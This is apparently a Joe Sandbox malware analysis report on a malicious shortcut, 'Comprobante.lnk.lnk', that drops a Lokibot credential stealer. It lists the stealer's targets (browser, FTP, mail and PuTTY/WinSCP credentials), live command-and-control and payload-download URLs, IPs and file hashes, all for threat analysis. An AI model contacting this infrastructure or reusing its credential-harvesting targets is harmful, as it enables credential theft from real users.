Source: C:\Users\user\Desktop\mjtjewi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 1392, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\mjtjewi.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\mjtjewi.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\mjtjewi.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\mjtjewi.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: PopPassword		6_2_0040D069
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: SmtpPassword		6_2_0040D069

Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 PowerShell	1 DLL Side-Loading	111 Process Injection	1 Deobfuscate/Decode Files or Information	2 Credentials in Registry	13 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	11 Process Discovery	Distributed Component Object Model	Input Capture	215 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Comprobante.lnk.lnk	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\mjtjewi.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
freighteighttwocam.ddns.net	45.149.241.169	true	true		unknown
www.sodiumlaurethsulfatedesyroyer.com	188.114.96.3	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php	true	unknown
http://kbfvzoboss.bid/alien/fre.php	true	unknown
http://alphastand.top/alien/fre.php	true	unknown
http://alphastand.win/alien/fre.php	true	unknown
http://alphastand.trade/alien/fre.php	true	unknown
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1499571714.0000020C5BA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1499571714.0000020C5B93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.sodiumlaurethsulfatedesyroyer.com	powershell.exe, 00000000.00000002.1464066335.0000020C4CEF3000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://go.micro	powershell.exe, 00000000.00000002.1464066335.0000020C4C502000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ibsensoftware.com/	mjtjewi.exe, mjtjewi.exe, 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://www.microsoft.co	powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.sodiumlaurethsulfatedesyroyer.com	powershell.exe, 00000000.00000002.1464066335.0000020C4CC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CEEE000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://freighteighttwocam.ddns.net/mdifygidj/five/fre.phpy	mjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1499571714.0000020C5BA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1499571714.0000020C5B93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://microsoft.coF	powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg	powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp, Comprobante.lnk.lnk	true		unknown
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.c	powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	www.sodiumlaurethsulfatedesyroyer.com	European Union		13335	CLOUDFLARENETUS	true
45.149.241.169	freighteighttwocam.ddns.net	Germany		701	UUNETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524798
Start date and time:	2024-10-03 09:19:31 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Comprobante.lnk.lnk
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winLNK@12/10@3/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 88% Number of executed functions: 85 Number of non-executed functions: 39
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 4552 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Comprobante.lnk.lnk

Simulations

Behavior and APIs

Time	Type	Description
03:20:39	API Interceptor	42x Sleep call for process: powershell.exe modified
03:20:50	API Interceptor	102x Sleep call for process: mjtjewi.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	1tstvk3Sls.exe	Get hash	malicious	RHADAMANTHYS	Browse	microsoft-rage.world/Api/v3/qjqzqiiqayjq
	http://Asm.alcateia.org	Get hash	malicious	HTMLPhisher	Browse	asm.alcateia.org/
	hbwebdownload - MT 103.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
	z4Shipping_document_pdf.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/g48c/
	update SOA.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/5hcm/
	docs.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	wwvmicrosx.live/office365/office_cookies/main/
	http://fitur-dana-terbaru-2024.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	fitur-dana-terbaru-2024.pages.dev/favicon.ico
	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
freighteighttwocam.ddns.net	Detalles_del_albaran.exe	Get hash	malicious	AsyncRAT	Browse	94.156.102.141
www.sodiumlaurethsulfatedesyroyer.com	PAGO.08.12.2024.lnk.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	Estado de cuenta .xls	Get hash	malicious	XenoRAT	Browse	188.114.96.3
	Comprobante_Pago.08.12.2024.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.16.12
	DHL Receipt_AWB 9892671327.xls	Get hash	malicious	Unknown	Browse	172.67.216.244
	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	MVR-00876 CARRARO ITALIA SPA.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	Payment proof.xls	Get hash	malicious	Unknown	Browse	104.21.78.54
	5STdfnsEu5.exe	Get hash	malicious	LummaC	Browse	104.21.16.12
	MVR-00876 CARRARO ITALIA SPA.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Payment proof.xls	Get hash	malicious	Unknown	Browse	104.21.78.54
UUNETUS	yakov.arm.elf	Get hash	malicious	Mirai	Browse	71.249.27.4
	yakov.m68k.elf	Get hash	malicious	Mirai	Browse	71.168.245.89
	yakov.arm7.elf	Get hash	malicious	Mirai	Browse	173.77.39.174
	yakov.mpsl.elf	Get hash	malicious	Mirai	Browse	139.4.200.165
	novo.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	63.78.130.243
	novo.arm64.elf	Get hash	malicious	Mirai, Moobot	Browse	141.155.190.165
	novo.arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	65.192.241.92
	novo.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	208.210.106.232
	novo.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	64.36.13.201
	novo.ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	149.230.228.170

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	sostener.vbs	Get hash	malicious	Njrat	Browse	188.114.96.3
	sostener.vbs	Get hash	malicious	XWorm	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Stealc	Browse	188.114.96.3

Process:	C:\Users\user\Desktop\mjtjewi.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	706
Entropy (8bit):	5.349842958726647
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhav:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhk
MD5:	873FA73F7EAAC5A90DC38988855C5032
SHA1:	694CDB950E35FE9EDBAE22377CBB1630F8F1DB84
SHA-256:	501001FA544E6D1C28EE3BAAAB9CC953E4421AD91222FF68C44CB5BC015D6E02
SHA-512:	3DE429FD9A218A6B491E0D9346A31E9B0418331649452B0AA161452DE6D2DA535AAA3E0FE18FE73B0A7AF77DE7C43DAD77E2C72ADFAC153A1E5EB279FAEB32B0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulnmWllZ:NllUmWl
MD5:	3EBBEC2F920D055DAC842B4FF84448FA
SHA1:	52D2AD86C481FAED6187FC7E6655C5BD646CA663
SHA-256:	32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
SHA-512:	163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xhwed1k.oda.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_unwrbiun.5ww.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)

Download File

Process:	C:\Users\user\Desktop\mjtjewi.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	371712
Entropy (8bit):	7.854168969155107
Encrypted:	false
SSDEEP:	6144:Mt0VqnKoq12xV+0+LGQ3orU7K9ORPCfQzyI4w2Q8y7tRQG9oeGdwpx6sqyqqQlh4:MIqnJV+3GTQVzZ+MXf6Ex6sqyqqQlhcl
MD5:	DB94D5DF4ADD0A06F261EAE73C2DA5DB
SHA1:	A37FFECD4004127C3EE2E4ED8F2E5D507C418DC1
SHA-256:	8CF4CC35E623A326F1B5FE4892F5D5E44272925F33B7439E675EDFC81BA2AF70
SHA-512:	8FC3F52D241CD06DB33BCC6FB85564A4FD3EE171E154162B2FB5B1C8E63216CD0F470EBE9DDC1D5E093B4713E1E93DF33D696EED0258D89E3A33B68D47B3CC67
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QA.f............................. ... ... ....@.. .......................@............`.................................$'..W.......8............................................................................ ............... ..H...........j1CM!e^U..... ......................@....text....... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B............. ...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\mjtjewi.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\6c132e98e5a06fd825caf0498d9711c3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\mjtjewi.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	0.9390929552354661
Encrypted:	false
SSDEEP:	3:/lbORkn:0en
MD5:	5613DEA7B6F9C4C154D8E228D35F972D
SHA1:	E330C16379E078920136F9FF0E43F865B84E7B13
SHA-256:	6472377665EEE67CA32FB8213E50A5577DC617DB5C53B9D35AAC4DA2C7D0DCEE
SHA-512:	B2DE1CAAE44D8822508F4D00D2824C0749BC8C4D75BBE726D54229F6FDCD218A74EC7B293C5A6069041B5E3133ECF089BA46E763DDD6E448D93F309360E1BE85
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3BDBEQO9NFNA05DW626L.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5353
Entropy (8bit):	3.4068292302060743
Encrypted:	false
SSDEEP:	48:ethGaCvsOcGAVo13m9/SXplxcc7SogZo/KFG9/SXpl+cc7SogZo/c1:eHG6OzmY2QXpMbHeDQXpjbHeW
MD5:	B6C0A170557982613E817965D43EDDD8
SHA1:	153ED0A5BF421C6FB3E44A9B40D891A98343D176
SHA-256:	D88303E92E6BC7DF505D1FA9DD854253821171203FB3931AC4470C1BCFA5B8AF
SHA-512:	D781053E11345E94DA973E2419F2715D11C14A5F759C47F5B48F0EBFAA9CC9E7945D665A96A3913013045BC814532C69B68189C9E93E528FBDB73890CB2DEE60
Malicious:	false
Preview:	...................................FL..................F.`.. ...=FSc\|....3.d....r.d................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........z...{.Le\|....3.d.....t.2.....CY.: .COMPRO~1.LNK..X......EW*YCY.:..........................'./.C.o.m.p.r.o.b.a.n.t.e...l.n.k...l.n.k.......Y...............-.......X....................C:\Users\user\Desktop\Comprobante.lnk.lnk.. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.p.e.r.f.i.0.0.9...d.a.t.........%SystemRoot%\system32\perfi009.dat..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.p.e.r.f.i.0.0.9...d.a.t........................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7b78f1e09efa3ae5.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5353
Entropy (8bit):	3.4068292302060743
Encrypted:	false
SSDEEP:	48:ethGaCvsOcGAVo13m9/SXplxcc7SogZo/KFG9/SXpl+cc7SogZo/c1:eHG6OzmY2QXpMbHeDQXpjbHeW
MD5:	B6C0A170557982613E817965D43EDDD8
SHA1:	153ED0A5BF421C6FB3E44A9B40D891A98343D176
SHA-256:	D88303E92E6BC7DF505D1FA9DD854253821171203FB3931AC4470C1BCFA5B8AF
SHA-512:	D781053E11345E94DA973E2419F2715D11C14A5F759C47F5B48F0EBFAA9CC9E7945D665A96A3913013045BC814532C69B68189C9E93E528FBDB73890CB2DEE60
Malicious:	false
